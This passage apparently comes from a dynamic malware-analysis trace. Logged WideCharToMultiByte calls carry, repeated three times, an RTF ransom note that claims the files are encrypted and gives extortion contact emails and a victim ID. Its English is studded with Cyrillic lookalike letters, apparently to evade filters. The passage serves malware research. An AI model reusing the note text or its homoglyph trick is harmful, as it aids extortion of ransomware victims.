ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 